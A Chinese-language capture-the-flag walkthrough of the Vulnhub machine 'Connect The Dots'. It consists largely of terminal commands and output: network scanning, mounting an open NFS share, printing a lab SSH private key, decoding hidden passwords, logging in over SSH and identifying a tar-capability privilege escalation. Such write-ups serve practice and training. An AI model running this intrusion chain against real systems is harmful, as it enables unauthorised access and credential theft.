Connect The Dots
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:3c:b6:46 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:73:75:f9 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-08 23:18 EDT
Nmap scan report for deathnote.vuln (192.168.56.254)
Host is up (0.00025s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Landing Page
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34417/tcp mountd
| 100005 1,2,3 36033/tcp6 mountd
| 100005 1,2,3 57053/udp mountd
| 100005 1,2,3 57695/udp6 mountd
| 100021 1,3,4 32979/tcp nlockmgr
| 100021 1,3,4 42415/udp6 nlockmgr
| 100021 1,3,4 43151/udp nlockmgr
| 100021 1,3,4 45629/tcp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7822/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 384fe876b4b704650976dd234eb569ed (RSA)
| 256 acd2a60f4b4177df06f011d592399feb (ECDSA)
|_ 256 93f7786fcce8d48d754bc2bc134bf0dd (ED25519)
32979/tcp open nlockmgr 1-4 (RPC #100021)
34417/tcp open mountd 1-3 (RPC #100005)
34421/tcp open mountd 1-3 (RPC #100005)
39227/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:73:75:F9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ showmount -e 192.168.56.254
Export list for 192.168.56.254:
/home/morris *
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ mkdir sharedata
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ sudo mount -t nfs 192.168.56.254:/home/morris sharedata
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ cd sharedata
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots/sharedata]
└─$ ls -alh
total 56K
drwxr-xr-x 8 kali kali 4.0K Oct 11 2019 .
drwxr-xr-x 3 kali kali 4.0K Jun 8 23:19 ..
-rw------- 1 kali kali 1 Oct 11 2019 .bash_history
-rw-r--r-- 1 kali kali 220 Oct 10 2019 .bash_logout
-rw-r--r-- 1 kali kali 3.5K Oct 10 2019 .bashrc
drwx------ 9 kali kali 4.0K Oct 10 2019 .cache
drwx------ 10 kali kali 4.0K Oct 11 2019 .config
drwx------ 3 kali kali 4.0K Oct 10 2019 .gnupg
-rw------- 1 kali kali 1.9K Oct 11 2019 .ICEauthority
drwx------ 3 kali kali 4.0K Oct 10 2019 .local
-rw-r--r-- 1 kali kali 807 Oct 10 2019 .profile
drwx------ 2 kali kali 4.0K Oct 10 2019 .ssh
drwxr-xr-x 2 kali kali 4.0K Oct 10 2019 Templates
-rw------- 1 kali kali 52 Oct 10 2019 .Xauthority
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots/sharedata]
└─$ cd .ssh
┌──(kali㉿kali)-[~/…/Vulnhub/Connect_the_dots/sharedata/.ssh]
└─$ ls -alh
total 16K
drwx------ 2 kali kali 4.0K Oct 10 2019 .
drwxr-xr-x 8 kali kali 4.0K Oct 11 2019 ..
-rw------- 1 kali kali 1.8K Oct 11 2019 id_rsa
-rw-r--r-- 1 kali kali 395 Oct 11 2019 id_rsa.pub
┌──(kali㉿kali)-[~/…/Vulnhub/Connect_the_dots/sharedata/.ssh]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEArk8CQ4/wfxbRkZExIsKaKudv417Wngdv0ePocrwKOhblnhr5fnb5
IAZAOXS+uO1CV8eg1E4fsZGUmr/QSjnkqWdqnFD/JTH/h/Y+SwobvxOQe3WRFAyQJvEM8C
SSCAxoVaKnclVS+JFPLzs3YCx48Y/VUbKByArrpuv0hw3UxlHEFdXxYGJWa6zXFXlmbRLn
Tej1xfCa45hnC5YlSka57bnAnv6rk+xzBznLJ2Q2srpnyivz/6fNuWb5x7Rz2s4IeNUpi2
4JbTs/ldTQWKxjT8K62YGcNpSrg1RMVvrUcuUK/bfdikuyRBNuturzXBvQ0aTQ7fYkTFgH
6Bn5aCfTXwAAA8gsPQrlLD0K5QAAAAdzc2gtcnNhAAABAQCuTwJDj/B/FtGRkTEiwpoq52
/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8l
Mf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/
SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDay
umfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t9
2KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9NfAAAAAwEAAQAAAQB51d/POZzwOBLjnIir
sznvIzWhx3hbnPcbziF7kNPVJov4pwIc0yvupm/duSxWNgBZOr+/pZuhkhA82jXMrAqYHi
D2gebVKM1jS0rfSIF8XUBwCw0M5nsbvQE+GVG5LnL+6GICGIGWHHssmEdsgalHrzF7mTn9
iSSN1/9jJtfChdxnHYSOa6hbmjXOkQ3rCJ6xJCYOQ7Oh/KsGbOqzErKAFpv22MD1OQ9xM3
Q+bm7QeHRMyXeM03z4yhty2VnrqcJGWFzUCtod3YigXITC18XfFmJ4sy4IFvYdJ/3lD7El
1hNisOWmSs5M/FXXZXS8u+ISXaKeTbN1l7PhC9S8wSaBAAAAgF7o7I23cGWx5zBYcxTjJv
SOOkgolM/Ki9/fM/MDAcOGeN2MbY+bgyxVWLSWLPx7ZqhS3+eyCV5aerHkC7jPZfTxNjcW
hJuJ4HSEu+BsXGCOutZUCeG9C4tAlWgIKttoc9jW7sgnfus7a0bUZxhmDNWGwf/KcChh5l
p57d8SFJb/AAAAgQDjAiuzQ6hmjVuJ/lTtDQRJDQM24qutH1K93cIoit3oDyotQukaVL8A
T9Lv+bVEAWM2qClga2+I/MxFtepZi/vdHtZR7afhD8qWUDEm32wnUeBDch0KOKjojjhBEw
Ay0LCibdgQpYtR0fAVsWaJXJmgkb7wL7KMd+tLld2e3cDdXQAAAIEAxJHdrnE5UWGoBwcw
HjEqjR7QVbhiVhWM2m4p6RN5xx+x2CKnATUyQCN9iZ6w7jpgMkQXHjqm6V+pKkudgHuwBh
BvfVNWIPvu4Z3GgYIIeqJuqcAm7K/VD0vatUNd2WYTin3JwdrpwEHLKsWzM1oscc1Ec/If
uiW7R6xHrWHGK+sAAAANbW9ycmlzQHNpcnJvbQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
拷贝私钥文件内容,创建为私钥文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ ssh -i id_rsa morris@192.168.56.254 -p 7822
morris@192.168.56.254's password:
Permission denied, please try again.
morris@192.168.56.254's password:
但是并不能连接成功。需要继续收集更多信息:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ nikto -h http://192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-06-08 23:29:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.htm, /index.html.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 7ac, size: 59494509b9f00, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /hits.txt: This might be interesting.
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-06-08 23:29:47 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ curl http://192.168.56.254/hits.txt
Remember! Keep your enumeration game strong!
──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,bak,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/06/08 23:30:50 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 1964]
/.html (Status: 403) [Size: 294]
/images (Status: 301) [Size: 317] [--> http://192.168.56.254/images/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.254/manual/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.254/javascript/]
/hits.txt (Status: 200) [Size: 44]
/backups (Status: 200) [Size: 6301]
/backups.html (Status: 200) [Size: 325]
/mysite (Status: 301) [Size: 317] [--> http://192.168.56.254/mysite/]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
发现了/mysite目录,存在用户登录页面,但是经过检查页面源代码,这并不是真正的登录页面。
在/mysite目录下有个bootstrap.min.cs文件很可疑,因为不是css,而是cs
然后在浏览器console中console.log(b1+b2+b3+b4+b5+b6+b7+b8+b9+10)得到jsfuck编码后的数据,用在线网站解码:
http://codertab.com/JsUnFuck
得到:
TryToGuessThisNorris@2k19
因此猜测用户名为norris,密码为TryToGuessThisNorris@2k19
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ ssh norris@192.168.56.254 -p 7822
norris@192.168.56.254's password:
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
###
# # # # ##### # ## ##### # # # ####
# ## # # # # # # # # ## # # #
# # # # # # # # # # # # # # #
# # # # # # # ###### # # # # # # ###
# # ## # # # # # # # # ## # #
### # # # # # # # # # # # ####
norris@sirrom:~$ id
uid=1001(norris) gid=1001(norris) groups=1001(norris),27(sudo)
norris@sirrom:~$ ls -alh
total 40K
drwxr-xr-x 5 norris norris 4.0K Jun 9 09:36 .
drwxr-xr-x 4 root root 4.0K Oct 11 2019 ..
-r-------- 1 norris norris 1 Oct 11 2019 .bash_history
-rw-r--r-- 1 norris norris 220 Oct 11 2019 .bash_logout
-rw-r--r-- 1 norris norris 3.5K Oct 11 2019 .bashrc
dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11 2019 ftp
drwx------ 3 norris norris 4.0K Jun 9 09:36 .gnupg
drwxr-xr-x 3 norris norris 4.0K Oct 11 2019 .local
-rw-r--r-- 1 norris norris 807 Oct 11 2019 .profile
-r-------- 1 norris norris 33 Oct 11 2019 user.txt
norris@sirrom:~$ cat user.txt
2c2836a138c0e7f7529aa0764a6414d0
norris@sirrom:~$
提权
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ wget http://192.168.56.254:8000/game.jpg.bak
--2023-06-09 01:56:22-- http://192.168.56.254:8000/game.jpg.bak
Connecting to 192.168.56.254:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39610 (39K) [application/x-trash]
Saving to: ‘game.jpg.bak’
game.jpg.bak 100%[============================================================================>] 38.68K --.-KB/s in 0s
2023-06-09 01:56:22 (141 MB/s) - ‘game.jpg.bak’ saved [39610/39610]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ exiftool game.jpg.bak
ExifTool Version Number : 12.57
File Name : game.jpg.bak
Directory : .
File Size : 40 kB
File Modification Date/Time : 2019:10:10 16:46:38-04:00
File Access Date/Time : 2023:06:09 01:56:22-04:00
File Inode Change Date/Time : 2023:06:09 01:56:22-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 192
Y Resolution : 192
Exif Byte Order : Big-endian (Motorola, MM)
Orientation : Horizontal (normal)
Comment : .... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
Image Width : 712
Image Height : 350
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 712x350
Megapixels : 0.249
game.jpg.bak图片元数据中有摩斯编码数据:用cyberchef网站解码:
I FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE+
提示有个secretfile
norris@sirrom:/var/www/html$ ls -alh
total 368K
drwxr-xr-x 4 root root 4.0K Oct 11 2019 .
drwxr-xr-x 3 root root 4.0K Oct 11 2019 ..
-rw-r--r-- 1 www-data www-data 6.2K Oct 11 2019 backups
-rw-r--r-- 1 www-data www-data 325 Oct 11 2019 backups.html
-rw-r--r-- 1 www-data www-data 77K Oct 10 2019 bootstrap.bundle.min.js
-rw-r--r-- 1 www-data www-data 153K Oct 10 2019 bootstrap.min.css
-rw-r--r-- 1 www-data www-data 44 Oct 11 2019 hits.txt
drwxr-xr-x 2 www-data www-data 4.0K Oct 11 2019 images
-rw-r--r-- 1 www-data www-data 2.2K Oct 11 2019 index.htm
-rw-r--r-- 1 www-data www-data 2.0K Oct 11 2019 index.html
-rw-r--r-- 1 www-data www-data 70K Oct 10 2019 jquery.slim.min.js
-rw-r--r-- 1 www-data www-data 879 Oct 11 2019 landing.css
drwxr-xr-x 2 www-data www-data 4.0K Oct 11 2019 mysite
-rw-r--r-- 1 www-data www-data 99 Oct 11 2019 secretfile
-rw------- 1 www-data www-data 12K Oct 11 2019 .secretfile.swp
norris@sirrom:/var/www/html$ cat secretfile
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.
将.secretfile.swp下载到kali linux,直接用浏览器下载该文件,否则没有权限:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ strings secretfile.swp
b0VIM 8.1
root
sirrom
/var/www/html/secretfile
U3210
#"!
blehguessme090
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..
经过测试该密码为morris的密码,并非root
norris@sirrom:/var/www/html$ su - root
Password:
su: Authentication failure
norris@sirrom:/var/www/html$ su - morris
Password:
morris@sirrom:~$ id
uid=1000(morris) gid=1000(morris) groups=1000(morris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)
morris@sirrom:~$
运行linpeas.sh脚本:
Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
可以利用tar命令提权